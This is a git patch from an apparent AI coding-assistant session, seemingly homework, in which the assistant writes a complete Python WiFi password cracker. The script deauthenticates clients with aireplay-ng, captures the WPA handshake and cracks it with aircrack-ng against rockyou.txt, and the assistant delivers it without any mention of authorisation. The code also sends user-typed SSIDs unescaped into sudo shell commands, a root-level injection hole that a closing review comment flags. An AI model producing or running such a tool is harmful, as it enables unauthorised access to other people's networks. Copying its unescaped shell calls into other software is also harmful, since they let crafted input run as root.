From c2e9d1eec5a4f129fe17489bbf19617f9300ace0 Mon Sep 17 00:00:00 2001 
From: David Westgate Date: Thu, 30 May 2024 14:44:42 -0700 Subject: [PATCH] aider: Implemented a Python application to assist in WiFi penetration testing by prompting the user for a target network SSID, capturing the handshake, and cracking the password using a wordlist. # Aider chat conversation: USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password. This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng. Operations may be run sequentially, or in parallel using multi-threading As needed, the use of shell tools should utilize sudo capabilities As needed, the application may utilize a wordlist found at ~/rockyou.txt As needed, the application can change the state of the users wifi interface between managed and monitor mode Save this to hw7/claude/app.py ASSISTANT: Here is the Python application to assist in WiFi penetration testing, saved to hw7/claude/app.py: hw7/claude/app.py ```python <<<<<<< SEARCH ======= import subprocess import re def run_command(command): output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) return output.decode('utf-8') def change_to_monitor_mode(interface): run_command(f"sudo airmon-ng start {interface}") def change_to_managed_mode(interface): run_command(f"sudo airmon-ng stop {interface}") def get_wifi_interfaces(): output = run_command("iwconfig") interfaces = re.findall(r"(\w+)\s+IEEE", output) return interfaces def get_target_network(interface): while True: target_ssid = input("Enter the SSID of the target network: ") output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}") if target_ssid in output: break print(f"Network {target_ssid} not found. 
Please try again.") return target_ssid def capture_handshake(target_network, interface): print(f"Capturing handshake for network {target_network}...") run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &") run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}") run_command("sudo killall airodump-ng") def crack_password(capture_file, wordlist): print("Cracking password...") output = run_command(f"aircrack-ng {capture_file} -w {wordlist}") password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1) return password def main(): interfaces = get_wifi_interfaces() if len(interfaces) == 0: print("No WiFi interfaces found.") return interface = interfaces[0] print(f"Using interface {interface}") change_to_monitor_mode(interface) target_network = get_target_network(interface) capture_handshake(target_network, interface) change_to_managed_mode(interface) capture_file = "capture-01.cap" wordlist = "~/rockyou.txt" password = crack_password(capture_file, wordlist) print(f"Password for network {target_network} is: {password}") if __name__ == "__main__": main() >>>>>>> REPLACE ``` This application does the following: 1. Gets the available WiFi interfaces using `iwconfig` 2. Prompts the user to enter the SSID of the target network 3. Changes the WiFi interface to monitor mode using `airmon-ng` 4. Captures the handshake for the target network using `airodump-ng` and `aireplay-ng` 5. Changes the WiFi interface back to managed mode 6. Cracks the password using the captured handshake file and a wordlist (`~/rockyou.txt`) with `aircrack-ng` 7. Prints out the cracked password for the target network It uses `subprocess` to run the shell commands and `re` to parse the output. The WiFi interface is changed between managed and monitor modes as needed. --- hw7/claude/app.py | 63 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) diff --git a/hw7/claude/app.py b/hw7/claude/app.py index e69de29..95ad8ab 100644 
--- a/hw7/claude/app.py
+++ b/hw7/claude/app.py
@@ -0,0 +1,63 @@
+import subprocess
+import re
+
+def run_command(command):
+ output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
+ return output.decode('utf-8')
+
+def change_to_monitor_mode(interface):
+ run_command(f"sudo airmon-ng start {interface}")
+
+def change_to_managed_mode(interface):
+ run_command(f"sudo airmon-ng stop {interface}")
+
+def get_wifi_interfaces():
+ output = run_command("iwconfig")
+ interfaces = re.findall(r"(\w+)\s+IEEE", output)
+ return interfaces
+
+def get_target_network(interface):
+ while True:
+ target_ssid = input("Enter the SSID of the target network: ")
+ output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
+ if target_ssid in output:
+ break
+ print(f"Network {target_ssid} not found. Please try again.")
+ return target_ssid
+
+def capture_handshake(target_network, interface):
+ print(f"Capturing handshake for network {target_network}...")
+ run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
+ run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
+ run_command("sudo killall airodump-ng")
+
+def crack_password(capture_file, wordlist):
+ print("Cracking password...")
+ output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
+ password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
+ return password
+
+def main():
+ interfaces = get_wifi_interfaces()
+ if len(interfaces) == 0:
+ print("No WiFi interfaces found.")
+ return
+
+ interface = interfaces[0]
+ print(f"Using interface {interface}")
+
+ change_to_monitor_mode(interface)
+
+ target_network = get_target_network(interface)
+ capture_handshake(target_network, interface)
+
+ change_to_managed_mode(interface)
+
+ capture_file = "capture-01.cap"
+ wordlist = "~/rockyou.txt"
+ password = crack_password(capture_file, wordlist)
+
+ print(f"Password for network {target_network} is: {password}")
+
+if __name__ == "__main__":
+ main()
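Review bot: `run_command` executes every command with `shell=True`, and each caller assembles the command line by f-string interpolation, so the `target_ssid` read from `input()` in `get_target_network` (and reused as `target_network` in `capture_handshake`) reaches the shell unescaped; a value containing a single quote or other shell metacharacters is parsed as shell syntax, and because those commands are prefixed with `sudo` the result runs with root privileges. Wrap each interpolated value with `shlex.quote`, e.g. `run_command(f"sudo airodump-ng --essid {shlex.quote(target_ssid)} {interface}")` with `import shlex` added at the top, or pass an argv list with `shell=False` for the calls that need no shell features. Separately, `crack_password` calls `.group(1)` directly on the result of `re.search`, which is `None` whenever the output contains no `KEY FOUND!` line, so that case surfaces as an `AttributeError` rather than a clear message; test the match object before indexing it.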